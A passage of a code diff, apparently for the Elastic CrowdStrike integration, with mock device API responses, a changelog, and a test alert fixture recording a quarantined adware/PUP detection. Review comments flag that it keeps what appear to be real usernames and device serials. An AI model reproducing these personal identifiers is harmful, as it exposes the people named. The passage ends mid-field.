"applied_date":"2023-11-07T04:52:59.659583066Z", + "assigned_date":"2023-11-07T04:47:43.342175341Z", + "policy_id":"64bfa2bbcd4e46da92a66b107933da11", + "policy_type":"sensor-update", + "settings_hash":"tagged|18;101", + "uninstall_protection":"ENABLED" + } + }, + "external_ip":"81.2.69.192", + "first_seen":"2023-06-08T10:00:19Z", + "group_hash":"b607fe25348a46d421ff46e19741b0caf5bbc70bb6da1637f56e97b4e1454d77", + "groups":[ + "182388a8dbea4c44b5e019cfd32c2695" + ], + "hostname":"CLM101-131.local", + "kernel_version":"22.6.0", + "last_seen":"2023-11-07T10:25:24Z", + "local_ip":"81.2.69.142", + "mac_address":"14-7d-da-ad-ac-71", + "machine_domain":"SYS", + "major_version":"22", + "meta":{ + "version":"6002", + "version_string":"7:43570272778" + }, + "minor_version":"6", + "modified_timestamp":"2023-11-07T10:26:53Z", + "os_build":"22G120", + "os_version":"Ventura(13)", + 
"platform_id":"1", + "platform_name":"Mac", + "policies":[ + { + "applied":true, + "applied_date":"2023-06-08T10:04:47.643357971Z", + "assigned_date":"2023-06-08T10:03:49.505180252Z", + "policy_id":"1024fac1b279424fa7300b8ac2d56be5", + "policy_type":"prevention", + "rule_groups":[], + "settings_hash":"f7a54ca1" + } + ], + "product_type_desc":"Workstation", + "provision_status":"Provisioned", + "reduced_functionality_mode":"no", + "serial_number":"FVFDH73HMNHX", + "site_name":"Default-First-Site-Name", + "status":"normal", + "system_manufacturer":"ABCInc.", + "system_product_name":"Air,1", + "tags":[ + "tags" + ] + } + ] + } + - path: /devices/entities/devices/v2 + methods: ['POST'] + request_body: /.*"def"*/ + responses: + - status_code: 200 + headers: + Content-Type: + - application/json + body: |- + { + "resources":[ + { + "agent_load_flags":"0", + "agent_local_time":"2023-11-07T04:51:16.678Z", + "agent_version":"7.05.17603.0", + "bios_manufacturer":"ABCInc.", + "bios_version":"2020.0.1.0.0(iBridge:22.11.000.0.0,0)", + "chassis_type":"9", + "chassis_type_desc":"Laptop", + "cid":"92012896127c4948236ba7601b886b0", + "config_id_base":"6594763", + "config_id_build":"1703", + "config_id_platform":"4", + "connection_ip":"81.2.69.192", + "cpu_signature":"460517", + "device_id":"3114433dbce478ca48d9a828b9b34be", + "device_policies":{ + "device_control":{ + "applied":true, + "applied_date":"2023-06-20T08:45:26.341093915Z", + "assigned_date":"2023-06-20T08:43:47.736146738Z", + "policy_id":"3f88daf0177f467dae69262a5ce71775", + "policy_type":"device-control" + }, + "firewall":{ + "applied":true, + "applied_date":"2023-09-11T10:33:44.174488832Z", + "assigned_date":"2023-09-11T10:32:47.853976945Z", + "policy_id":"1ee301f7e3e24e96ad6a23c73aaac1e3", + "policy_type":"firewall", + "rule_set_id":"1ee301f7e3e24e96ad6a23c73aaac1e3" + }, + "global_config":{ + "applied":true, + "applied_date":"2023-11-07T04:52:59.515775409Z", + "assigned_date":"2023-11-07T04:51:18.94671252Z", + 
"policy_id":"7e3078b60976486cac5dc998808d9135", + "policy_type":"globalconfig", + "settings_hash":"f01def74" + }, + "prevention":{ + "applied":true, + "applied_date":"2023-06-08T10:04:47.643357971Z", + "assigned_date":"2023-06-08T10:03:49.505180252Z", + "policy_id":"1024fac1b279424fa7300b8ac2d56be5", + "policy_type":"prevention", + "rule_groups":[], + "settings_hash":"f7a54ca1" + }, + "remote_response":{ + "applied":true, + "applied_date":"2023-06-08T10:04:47.01735027Z", + "assigned_date":"2023-06-08T10:03:49.505163572Z", + "policy_id":"dabb4def99034f11b9b3d52271584c9f", + "policy_type":"remote-response", + "settings_hash":"8a548e5e" + }, + "sensor_update":{ + "applied":true, + "applied_date":"2023-11-09T04:52:59.659583066Z", + "assigned_date":"2023-11-09T04:47:43.342175341Z", + "policy_id":"74bfa2bbcd4e46da92a66b107933da11", + "policy_type":"sensor-update", + "settings_hash":"tagged|18;101", + "uninstall_protection":"ENABLED" + } + }, + "external_ip":"81.2.69.192", + "first_seen":"2023-06-09T10:00:19Z", + "group_hash":"c607fe25348a46d421ff46e19741b0caf5bbc70bb6da1637f56e97b4e1454d77", + "groups":[ + "882388a8dbea4c44b5e019cfd32c2695" + ], + "hostname":"CLM101-141.local", + "kernel_version":"22.6.0", + "last_seen":"2023-11-09T10:25:24Z", + "local_ip":"81.2.69.142", + "mac_address":"14-7d-da-ad-ac-71", + "machine_domain":"SYS", + "major_version":"22", + "meta":{ + "version":"6002", + "version_string":"7:43570272778" + }, + "minor_version":"6", + "modified_timestamp":"2023-11-09T10:26:53Z", + "os_build":"22G120", + "os_version":"Ventura(13)", + "platform_id":"1", + "platform_name":"Mac", + "policies":[ + { + "applied":true, + "applied_date":"2023-06-09T10:04:47.643357971Z", + "assigned_date":"2023-06-09T10:03:49.505180252Z", + "policy_id":"2024fac1b279424fa7300b8ac2d56be5", + "policy_type":"prevention", + "rule_groups":[], + "settings_hash":"m7a54ca1" + } + ], + "product_type_desc":"Workstation", + "provision_status":"Provisioned", + 
"reduced_functionality_mode":"no", + "serial_number":"FVVDH73HMNHX", + "site_name":"Default-First-Site-Name", + "status":"normal", + "system_manufacturer":"ABCInc.", + "system_product_name":"Air,1", + "tags":[ + "tags" + ] + } + ] + } diff --git a/packages/crowdstrike/changelog.yml b/packages/crowdstrike/changelog.yml index 150a7f59b86..525898a80b0 100644 --- a/packages/crowdstrike/changelog.yml +++ b/packages/crowdstrike/changelog.yml @@ -1,4 +1,39 @@ # newer versions go on top +- version: "1.32.1" + changes: + - description: Fix cache option name in FDR data stream. + type: bugfix + link: https://github.com/elastic/integrations/pull/9436 +- version: "1.32.0" + changes: + - description: Set sensitive value as secret in cel input. + type: enhancement + link: https://github.com/elastic/integrations/pull/9238 +- version: "1.31.0" + changes: + - description: Add support for Alert and Host API endpoints. + type: enhancement + link: https://github.com/elastic/integrations/pull/8790 +- version: "1.30.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/8725 +- version: "1.29.0" + changes: + - description: Expose FDR cache options for more flexibility + type: enhancement + link: https://github.com/elastic/integrations/pull/9063 +- version: "1.28.3" + changes: + - description: Fix drive letter parsing. + type: bugfix + link: https://github.com/elastic/integrations/pull/1 +- version: "1.28.2" + changes: + - description: Add missing type mapping for host fields. + type: bugfix + link: https://github.com/elastic/integrations/pull/9030 - version: "1.28.1" changes: - description: Changed owners diff --git a/packages/crowdstrike/data_stream/alert/_dev/test/pipeline/test-alert.log b/packages/crowdstrike/data_stream/alert/_dev/test/pipeline/test-alert.log new file mode 100644 index 00000000000..aaa9e837412 --- /dev/null +++ b/packages/crowdstrike/data_stream/alert/_dev/test/pipeline/test-alert.log 
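Review bot: Both device responses (the `/.*"abc"*/` and `/.*"def"*/` rules for `/devices/entities/devices/v2`) return the same `"device_id":"3114433dbce478ca48d9a828b9b34be"`, the same `mac_address` and the same `local_ip`, and differ only in hostname, policy ids and timestamps; a pipeline that keys host identity or deduplication on `device_id` would collapse the two hosts into one and this system test would still pass. Give the second record a distinct `device_id` and MAC so the two-page pagination actually yields two distinguishable hosts. The `serial_number` values `FVFDH73HMNHX` and `FVVDH73HMNHX` have the shape of real Apple serials; if they were captured from a real machine they should be replaced with clearly synthetic strings before this is published. Note also that `device_id` here is 31 hex characters while the alert fixture uses 32, which is harmless for the mock but worth aligning so the fixtures reflect the real ID format.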
@@ -0,0 +1 @@ +{"agent_id":"2ce412d17b334ad4adc8c1c54dbfec4b","aggregate_id":"aggind:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778","alleged_filetype":"exe","cid":"92012896127c4a948236ba7601b886b0","cloud_indicator":"false","cmdline":"\"C:\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\"","composite_id":"92012896127c4a8236ba7601b886b0:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600","confidence":10,"context_timestamp":"2023-11-03T18:00:31Z","control_graph_id":"ctg:2ce4127b334ad4adc8c1c54dbfec4b:163208931778","crawl_edge_ids":{"Sensor":["KZcZ=__;K&cmqQ]Z=W,QK4W.9(rBfs\\gfmjTblqI^F-_oNnAWQ&-o0:dR/>>2JIVMD36[+=kiQDRm.bB?;d\"V0JaQlaltC59Iq6nM?6`>ZAs+LbOJ9p9A;9'WV9^H3XEMs8N","KZcZA__;?\"cmott@m_k)MSZ^+C?.cg92t[f!>*b9WLY@H!V0N,BJsNSTD:?/+fY';ea%iM\"__\"59K'R?_=`'`rK/'hA\"r+L5i-*Ut5PI!!*'!","N6CUF__;K!d$:[C93.?=/5(`5KnM]!L#UbnSY5HOHc#[6A&FE;(naXB4h/OG\"%MDAR=fo41Z]rXc\"J-\\&&V8UW.?I6V*G+,))Ztu_IuCMV#ZJ:QDJ_EjQmjiX#HENY'WD0rVAV$Gl6_+0e:2$8D)):.LUs+8-S$L!!!$!rr","N6CUF__;K!d$:\\N43JV0AO56@6D0$!na(s)d.dQ'iI1*uiKt#j?r\"X'\\AtNML2_C__7ic6,8Dc[F<0NTUGtl%HD#?/Y)t8!1X.;G!*FQ9GP-ukQn`6I##&$^81(P+hN*-#rf/cUs)Wb\"<_/?I'[##WMh'H[Rcl+!!<<'","N6L[G__;K!d\"qhT7k?[D\"Bk:5s%+=>#DM0j$_44ZjO9q*d!YLuHhkq!3>3tpi>OPYZp9]5f1#/AlRZL06`/I6cl\"d.&=To@9kS!prs8N"]},"crawl_vertex_ids":{"Sensor":["aggind:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778","ctg:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778","ind:2ce412d17b34ad4adc8c1c54dbfec4b:399748687993-5761-42627600","mod:2ce412d17b4ad4adc8c1c54dbfec4b:0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4","mod:2ce412d17b4ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd","mod:2ce412d17b334ad4adc8c1c54dbfec4b:caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33","pid:2ce412d17b33d4a
dc8c1c54dbfec4b:392734873135","pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876","pid:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993","quf:2ce412d17b334ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd","uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425"]},"crawled_timestamp":"2023-11-03T19:00:23.985020992Z","created_timestamp":"2023-11-03T18:01:23.995794943Z","data_domains":["Endpoint"],"description":"ThisfilemeetstheAdware/PUPAnti-malwareMLalgorithm'slowest-confidencethreshold.","device":{"agent_load_flags":"0","agent_local_time":"2023-10-12T03:45:57.753Z","agent_version":"7.04.17605.0","bios_manufacturer":"ABC","bios_version":"F8CN42WW(V2.05)","cid":"92012896127c4a948236ba7601b886b0","config_id_base":"65994763","config_id_build":"17605","config_id_platform":"3","device_id":"2ce412d17b334ad4adc8c1c54dbfec4b","external_ip":"81.2.69.142","first_seen":"2023-04-07T09:36:36Z","groups":["18704e21288243b58e4c76266d38caaf"],"hostinfo":{"active_directory_dn_display":["WinComputers","WinComputers\\ABC"],"domain":"ABC.LOCAL"},"hostname":"ABC709-1175","last_seen":"2023-11-03T17:51:42Z","local_ip":"81.2.69.142","mac_address":"ab-21-48-61-05-b2","machine_domain":"ABC.LOCAL","major_version":"10","minor_version":"0","modified_timestamp":"2023-11-03T17:53:43Z","os_version":"Windows11","ou":["ABC","WinComputers"],"platform_id":"0","platform_name":"Windows","pod_labels":null,"product_type":"1","product_type_desc":"Workstation","site_name":"Default-First-Site-Name","status":"normal","system_manufacturer":"LENOVO","system_product_name":"20VE"},"falcon_host_link":"https://falcon.us-2.crowdstrike.com/activity-v2/detections/dhjffg:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600","filename":"openvpn-abc-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe","filepath":"\\Device\\HarddiskVolume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNCl
ients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe","grandparent_details":{"cmdline":"C:\\Windows\\system32\\userinit.exe","filename":"userinit.exe","filepath":"\\Device\\HarddiskVolume3\\Windows\\System32\\userinit.exe","local_process_id":"4328","md5":"b07f77fd3f9828b2c9d61f8a36609741","process_graph_id":"pid:2ce412d17b334ad4adc8c1c54dbfec4b:392734873135","process_id":"392734873135","sha256":"caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33","timestamp":"2023-10-30T16:49:19Z","user_graph_id":"uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425","user_id":"S-1-5-21-1909377054-3469629671-4104191496-4425","user_name":"yuvraj.mahajan"},"has_script_or_module_ioc":"true","id":"ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600","indicator_id":"ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600","ioc_context":[{"ioc_description":"\\Device\\HarddiskVolume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe","ioc_source":"library_load","ioc_type":"hash_sha256","ioc_value":"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd","md5":"cdf9cfebb400ce89d5b6032bfcdc693b","sha256":"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd","type":"module"}],"ioc_values":[],"is_synthetic_quarantine_disposition":true,"local_process_id":"17076","logon_domain":"ABSYS","md5":"cdf9cfebb400ce89d5b6032bfcdc693b","name":"PrewittPupAdwareSensorDetect-Lowest","objective":"FalconDetectionMethod","parent_details":{"cmdline":"C:\\WINDOWS\\Explorer.EXE","filename":"explorer.exe","filepath":"\\Device\\HarddiskVolume3\\Windows\\explorer.exe","local_process_id":"1040","md5":"8cc3fcdd7d52d2d5221303c213e044ae","process_graph_i
d":"pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876","process_id":"392736520876","sha256":"0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4","timestamp":"2023-11-03T18:00:32Z","user_graph_id":"uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425","user_id":"S-1-5-21-1909377054-3469629671-4104191496-4425","user_name":"mohit.jha"},"parent_process_id":"392736520876","pattern_disposition":2176,"pattern_disposition_description":"Prevention/Quarantine,processwasblockedfromexecutionandquarantinewasattempted.","pattern_disposition_details":{"blocking_unsupported_or_disabled":false,"bootup_safeguard_enabled":false,"critical_process_disabled":false,"detect":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"inddet_mask":false,"indicator":false,"kill_action_failed":false,"kill_parent":false,"kill_process":false,"kill_subprocess":false,"operation_blocked":false,"policy_disabled":false,"process_blocked":true,"quarantine_file":true,"quarantine_machine":false,"registry_operation_blocked":false,"rooting":false,"sensor_only":false,"suspend_parent":false,"suspend_process":false},"pattern_id":5761,"platform":"Windows","poly_id":"AACSASiWEnxKlIIaw8LWC-8XINBatE2uYZaWqRAAATiEEfPFwhoY4opnh1CQjm0tvUQp4Lu5eOAx29ZVj-qrGrA==","process_end_time":"1699034421","process_id":"399748687993","process_start_time":"1699034413","product":"epp","quarantined_files":[{"filename":"\\Device\\Volume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe","id":"2ce412d17b334ad4adc8c1c54dbfec4b_b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd","sha256":"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd","state":"quarantined"}],"scenario":"NGAV","severity":30,"sha1":"0000000000000000000000000000000000000000","sha256":"b
26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd","show_in_ui":true,"source_products":["FalconInsight"],"source_vendors":["CrowdStrike"],"status":"new","tactic":"MachineLearning","tactic_id":"CSTA0004","technique":"Adware/PUP","technique_id":"CST0000","timestamp":"2023-11-03T18:00:22.328Z","tree_id":"1931778","tree_root":"38687993","triggering_process_graph_id":"pid:2ce4124ad4adc8c1c54dbfec4b:399748687993","type":"ldt","updated_timestamp":"2023-11-03T19:00:23.985007341Z","user_id":"S-1-5-21-1909377054-3469629671-4104191496-4425","user_name":"mohit.jha"} \ No newline at end of file diff --git a/packages/crowdstrike/data_stream/alert/_dev/test/pipeline/test-alert.log-expected.json b/packages/crowdstrike/data_stream/alert/_dev/test/pipeline/test-alert.log-expected.json new file mode 100644 index 00000000000..24c0bf45297 --- /dev/null +++ b/packages/crowdstrike/data_stream/alert/_dev/test/pipeline/test-alert.log-expected.json 
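Review bot: The sample event carries what appear to be real personal names (`yuvraj.mahajan`, `mohit.jha`) in `user_name`, `cmdline`, `filepath`, `ioc_description` and the `quarantined_files` entry, while the IP addresses in the same record have already been replaced with test values. Sample data committed to a public repository should be anonymised consistently: substitute synthetic account names in the same style the record already uses for the host (`ABC709-1175`, `ABC.LOCAL`) and regenerate `test-alert.log-expected.json`, which repeats the names verbatim in `related.user`, `process.user.name`, `user.name` and inside `event.original`.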
@@ -0,0 +1,315 @@ +{ + "expected": [ + { + "@timestamp": "2023-11-03T18:00:22.328Z", + "crowdstrike": { + "alert": { + "agent_id": "2ce412d17b334ad4adc8c1c54dbfec4b", + "aggregate_id": "aggind:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778", + "alleged_filetype": "exe", + "cid": "92012896127c4a948236ba7601b886b0", + "cloud_indicator": false, + "cmdline": "\"C:\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\"", + "composite_id": "92012896127c4a8236ba7601b886b0:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "confidence": 10, + "context_timestamp": "2023-11-03T18:00:31.000Z", + "control_graph_id": "ctg:2ce4127b334ad4adc8c1c54dbfec4b:163208931778", + "crawl_edge_ids": { + "Sensor": [ + "KZcZ=__;K&cmqQ]Z=W,QK4W.9(rBfs\\gfmjTblqI^F-_oNnAWQ&-o0:dR/>>2JIVMD36[+=kiQDRm.bB?;d\"V0JaQlaltC59Iq6nM?6`>ZAs+LbOJ9p9A;9'WV9^H3XEMs8N", + "KZcZA__;?\"cmott@m_k)MSZ^+C?.cg92t[f!>*b9WLY@H!V0N,BJsNSTD:?/+fY';ea%iM\"__\"59K'R?_=`'`rK/'hA\"r+L5i-*Ut5PI!!*'!", + "N6CUF__;K!d$:[C93.?=/5(`5KnM]!L#UbnSY5HOHc#[6A&FE;(naXB4h/OG\"%MDAR=fo41Z]rXc\"J-\\&&V8UW.?I6V*G+,))Ztu_IuCMV#ZJ:QDJ_EjQmjiX#HENY'WD0rVAV$Gl6_+0e:2$8D)):.LUs+8-S$L!!!$!rr", + "N6CUF__;K!d$:\\N43JV0AO56@6D0$!na(s)d.dQ'iI1*uiKt#j?r\"X'\\AtNML2_C__7ic6,8Dc[F<0NTUGtl%HD#?/Y)t8!1X.;G!*FQ9GP-ukQn`6I##&$^81(P+hN*-#rf/cUs)Wb\"<_/?I'[##WMh'H[Rcl+!!<<'", + "N6L[G__;K!d\"qhT7k?[D\"Bk:5s%+=>#DM0j$_44ZjO9q*d!YLuHhkq!3>3tpi>OPYZp9]5f1#/AlRZL06`/I6cl\"d.&=To@9kS!prs8N" + ] + }, + "crawl_vertex_ids": { + "Sensor": [ + "aggind:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778", + "ctg:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778", + "ind:2ce412d17b34ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "mod:2ce412d17b4ad4adc8c1c54dbfec4b:0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4", + 
"mod:2ce412d17b4ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "mod:2ce412d17b334ad4adc8c1c54dbfec4b:caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33", + "pid:2ce412d17b33d4adc8c1c54dbfec4b:392734873135", + "pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876", + "pid:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993", + "quf:2ce412d17b334ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425" + ] + }, + "crawled_timestamp": "2023-11-03T19:00:23.985Z", + "created_timestamp": "2023-11-03T18:01:23.995Z", + "data_domains": [ + "Endpoint" + ], + "description": "ThisfilemeetstheAdware/PUPAnti-malwareMLalgorithm'slowest-confidencethreshold.", + "device": { + "agent_load_flags": 0, + "agent_local_time": "2023-10-12T03:45:57.753Z", + "agent_version": "7.04.17605.0", + "bios_manufacturer": "ABC", + "bios_version": "F8CN42WW(V2.05)", + "cid": "92012896127c4a948236ba7601b886b0", + "config_id_base": "65994763", + "config_id_build": "17605", + "config_id_platform": 3, + "external_ip": "81.2.69.142", + "first_seen": "2023-04-07T09:36:36.000Z", + "groups": [ + "18704e21288243b58e4c76266d38caaf" + ], + "hostinfo": { + "active_directory_dn_display": [ + "WinComputers", + "WinComputers\\ABC" + ], + "domain": "ABC.LOCAL" + }, + "hostname": "ABC709-1175", + "id": "2ce412d17b334ad4adc8c1c54dbfec4b", + "last_seen": "2023-11-03T17:51:42.000Z", + "local_ip": "81.2.69.142", + "mac_address": "AB-21-48-61-05-B2", + "machine_domain": "ABC.LOCAL", + "major_version": "10", + "minor_version": "0", + "modified_timestamp": "2023-11-03T17:53:43.000Z", + "os_version": "Windows11", + "ou": [ + "ABC", + "WinComputers" + ], + "platform_id": "0", + "platform_name": "Windows", + "product_type": "1", + "product_type_desc": "Workstation", + "site_name": "Default-First-Site-Name", + "status": "normal", + "system_manufacturer": "LENOVO", + 
"system_product_name": "20VE" + }, + "falcon_host_link": "https://falcon.us-2.crowdstrike.com/activity-v2/detections/dhjffg:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "filename": "openvpn-abc-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "filepath": "\\Device\\HarddiskVolume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "grandparent_details": { + "cmdline": "C:\\Windows\\system32\\userinit.exe", + "filename": "userinit.exe", + "filepath": "\\Device\\HarddiskVolume3\\Windows\\System32\\userinit.exe", + "local_process_id": "4328", + "md5": "b07f77fd3f9828b2c9d61f8a36609741", + "process_graph_id": "pid:2ce412d17b334ad4adc8c1c54dbfec4b:392734873135", + "process_id": "392734873135", + "sha256": "caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33", + "timestamp": "2023-10-30T16:49:19.000Z", + "user_graph_id": "uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_id": "S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_name": "yuvraj.mahajan" + }, + "has_script_or_module_ioc": true, + "id": "ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "indicator_id": "ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "ioc_context": [ + { + "ioc_description": "\\Device\\HarddiskVolume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "ioc_source": "library_load", + "ioc_type": "hash_sha256", + "ioc_value": "b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "md5": "cdf9cfebb400ce89d5b6032bfcdc693b", + "sha256": 
"b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "type": "module" + } + ], + "is_synthetic_quarantine_disposition": true, + "local_process_id": "17076", + "logon_domain": "ABSYS", + "md5": "cdf9cfebb400ce89d5b6032bfcdc693b", + "name": "PrewittPupAdwareSensorDetect-Lowest", + "objective": "FalconDetectionMethod", + "parent_details": { + "cmdline": "C:\\WINDOWS\\Explorer.EXE", + "filename": "explorer.exe", + "filepath": "\\Device\\HarddiskVolume3\\Windows\\explorer.exe", + "local_process_id": "1040", + "md5": "8cc3fcdd7d52d2d5221303c213e044ae", + "process_graph_id": "pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876", + "process_id": "392736520876", + "sha256": "0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4", + "timestamp": "2023-11-03T18:00:32.000Z", + "user_graph_id": "uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_id": "S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_name": "mohit.jha" + }, + "parent_process_id": "392736520876", + "pattern_disposition": 2176, + "pattern_disposition_description": "Prevention/Quarantine,processwasblockedfromexecutionandquarantinewasattempted.", + "pattern_disposition_details": { + "blocking_unsupported_or_disabled": false, + "bootup_safeguard_enabled": false, + "critical_process_disabled": false, + "detect": false, + "fs_operation_blocked": false, + "handle_operation_downgraded": false, + "inddet_mask": false, + "indicator": false, + "kill_action_failed": false, + "kill_parent": false, + "kill_process": false, + "kill_subprocess": false, + "operation_blocked": false, + "policy_disabled": false, + "process_blocked": true, + "quarantine_file": true, + "quarantine_machine": false, + "registry_operation_blocked": false, + "rooting": false, + "sensor_only": false, + "suspend_parent": false, + "suspend_process": false + }, + "pattern_id": "5761", + "platform": "Windows", + "poly_id": 
"AACSASiWEnxKlIIaw8LWC-8XINBatE2uYZaWqRAAATiEEfPFwhoY4opnh1CQjm0tvUQp4Lu5eOAx29ZVj-qrGrA==", + "process_end_time": "2023-11-03T18:00:21.000Z", + "process_id": "399748687993", + "process_start_time": "2023-11-03T18:00:13.000Z", + "product": "epp", + "quarantined_files": [ + { + "filename": "\\Device\\Volume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "id": "2ce412d17b334ad4adc8c1c54dbfec4b_b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "sha256": "b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "state": "quarantined" + } + ], + "scenario": "NGAV", + "severity": 30, + "sha1": "0000000000000000000000000000000000000000", + "sha256": "b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "show_in_ui": true, + "source_products": [ + "FalconInsight" + ], + "source_vendors": [ + "CrowdStrike" + ], + "status": "new", + "tactic": "MachineLearning", + "tactic_id": "CSTA0004", + "technique": "Adware/PUP", + "technique_id": "CST0000", + "timestamp": "2023-11-03T18:00:22.328Z", + "tree_id": "1931778", + "tree_root": "38687993", + "triggering_process_graph_id": "pid:2ce4124ad4adc8c1c54dbfec4b:399748687993", + "type": "ldt", + "updated_timestamp": "2023-11-03T19:00:23.985Z", + "user_id": "S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_name": "mohit.jha" + } + }, + "device": { + "id": "2ce412d17b334ad4adc8c1c54dbfec4b" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "id": "ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "kind": "alert", + "original": 
